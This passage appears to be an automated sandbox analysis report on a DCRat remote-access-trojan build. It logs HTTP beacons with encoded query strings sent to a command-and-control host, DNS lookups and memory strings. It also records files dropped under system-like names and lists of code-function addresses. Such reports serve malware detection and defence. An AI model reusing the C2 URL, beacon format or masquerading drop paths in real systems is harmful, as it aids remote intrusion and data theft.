zI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ru
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=QX9JiI6ICNwgTNiVDOlJWYiZTMzY2MmBzYwM2MwETMjdDNkRmMlJCLiQTMkFzYkNTZilTMjFDOwczMyQTOiJzYiNWOlljMyE2MhVDOwMWOycjI6ISNwUmMiRjZyIDNiVGNkBjYmJDO1MTZ3M2NwEGO0EmN1ICLiITN1gjZwcTYmdTM4UzN2MjZwQWZxIDNlFjNyIDOhNmYmRTYlBDO4EjI6IyN3ETYjZmZwI2YiVGMjFWMjZGOxUjZwMTOlhTM3YGOjJyes0nIwglT2k0QkFTOXpFdsdkV3Z1VaNnTsl0cJlnW1x2RjxmVHJGVKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWSp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ru
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ruConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: cy98085.tw1.ru
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002600000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cy98085.tw1.ru
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cy98085.tw1.ru/
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002600000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cy98085.tw1.ru/d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxk
            Source: portperf.exe, 00000006.00000002.2222640406.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002645000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.maxmind.com

            System Summary

            barindex
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D6718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00D6718C
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile created: C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exeJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile created: C:\Windows\SystemTemp\Crashpad\9e8d7a4ca61bd9Jump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D6857B0_2_00D6857B
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D770BF0_2_00D770BF
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D6407E0_2_00D6407E
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D8D00E0_2_00D8D00E
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D911940_2_00D91194
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D802F60_2_00D802F6
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D632810_2_00D63281
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D6E2A00_2_00D6E2A0
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D766460_2_00D76646
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D737C10_2_00D737C1
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D627E80_2_00D627E8
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D8070E0_2_00D8070E
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D8473A0_2_00D8473A
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D6E8A00_2_00D6E8A0
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D849690_2_00D84969
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D6F9680_2_00D6F968
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D76A7B0_2_00D76A7B
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D73A3C0_2_00D73A3C
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D80B430_2_00D80B43
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D8CB600_2_00D8CB60
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D75C770_2_00D75C77
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D7FDFA0_2_00D7FDFA
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D73D6D0_2_00D73D6D
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D6ED140_2_00D6ED14
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D6DE6C0_2_00D6DE6C
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D6BE130_2_00D6BE13
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D80F780_2_00D80F78
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D65F3C0_2_00D65F3C
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeCode function: 6_2_00007FFD344704D36_2_00007FFD344704D3
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeCode function: 6_2_00007FFD344704986_2_00007FFD34470498
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeCode function: 6_2_00007FFD344705156_2_00007FFD34470515
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD34487AB220_2_00007FFD34487AB2
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD3449277020_2_00007FFD34492770
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD3449FF9020_2_00007FFD3449FF90
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344980AD20_2_00007FFD344980AD
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344A28B020_2_00007FFD344A28B0
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344A90B220_2_00007FFD344A90B2
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD3449908820_2_00007FFD34499088
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344959BD20_2_00007FFD344959BD
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344971BD20_2_00007FFD344971BD
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD3449524D20_2_00007FFD3449524D
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344911F120_2_00007FFD344911F1
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344B032220_2_00007FFD344B0322
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344A830620_2_00007FFD344A8306
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD3449630120_2_00007FFD34496301
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD3449E38020_2_00007FFD3449E380
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD34493C2820_2_00007FFD34493C28
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD34494CA920_2_00007FFD34494CA9
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344A0E5520_2_00007FFD344A0E55
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD3449B72520_2_00007FFD3449B725
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344A572420_2_00007FFD344A5724
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344947C020_2_00007FFD344947C0
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344A5FFD20_2_00007FFD344A5FFD
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344920B420_2_00007FFD344920B4
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344990D020_2_00007FFD344990D0
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD3449A86220_2_00007FFD3449A862
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD3449C08B20_2_00007FFD3449C08B
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD3449492920_2_00007FFD34494929
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344A110120_2_00007FFD344A1101
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344AE1A720_2_00007FFD344AE1A7
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344AE23020_2_00007FFD344AE230
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD3449F1F020_2_00007FFD3449F1F0
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344AE28520_2_00007FFD344AE285
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344AE32720_2_00007FFD344AE327
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344A7B0520_2_00007FFD344A7B05
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD34494B7920_2_00007FFD34494B79
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD3449BB9820_2_00007FFD3449BB98
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344994A020_2_00007FFD344994A0
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD34493C5020_2_00007FFD34493C50
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD34494C0820_2_00007FFD34494C08
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344804D320_2_00007FFD344804D3
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD3448049820_2_00007FFD34480498
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD3448051520_2_00007FFD34480515
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeCode function: 20_2_00007FFD344A281820_2_00007FFD344A2818
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeCode function: 23_2_00007FFD344904D323_2_00007FFD344904D3
            Source: C:\Program Files\7-Zip\Lang\System.exeCode function: 24_2_00007FFD344604D324_2_00007FFD344604D3
            Source: C:\Program Files\7-Zip\Lang\System.exeCode function: 24_2_00007FFD3446049824_2_00007FFD34460498
            Source: C:\Program Files\7-Zip\Lang\System.exeCode function: 26_2_00007FFD344804D326_2_00007FFD344804D3
            Source: C:\Program Files\7-Zip\Lang\System.exeCode function: 26_2_00007FFD3448049826_2_00007FFD34480498
            Source: C:\Program Files\7-Zip\Lang\System.exeCode function: 26_2_00007FFD3448051526_2_00007FFD34480515
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: String function: 00D7E360 appears 52 times
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: String function: 00D7ED00 appears 31 times
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: String function: 00D7E28C appears 35 times
            Source: portperf.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: dfVXJbANbh.exe.6.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: dfVXJbANbh.exe0.6.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: DCRatBuild.exe, 00000000.00000003.2137305380.0000000006840000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs DCRatBuild.exe
            Source: DCRatBuild.exe, 00000000.00000002.2142565234.0000000002F8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs DCRatBuild.exe
            Source: DCRatBuild.exe, 00000000.00000003.2141483616.0000000002F8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs DCRatBuild.exe
            Source: DCRatBuild.exe, 00000000.00000003.2138988212.000000000714C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs DCRatBuild.exe
            Source: DCRatBuild.exe, 00000000.00000003.2138544579.0000000007142000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs DCRatBuild.exe
            Source: DCRatBuild.exeBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs DCRatBuild.exe
            Source: DCRatBuild.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, T8FCuuYe5ynxfEF8Wit.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, T8FCuuYe5ynxfEF8Wit.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, lXmetBmZ2od6uQ9gUad.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, lXmetBmZ2od6uQ9gUad.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, T8FCuuYe5ynxfEF8Wit.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, T8FCuuYe5ynxfEF8Wit.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, lXmetBmZ2od6uQ9gUad.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, lXmetBmZ2od6uQ9gUad.csCryptographic APIs: 'TransformFinalBlock'
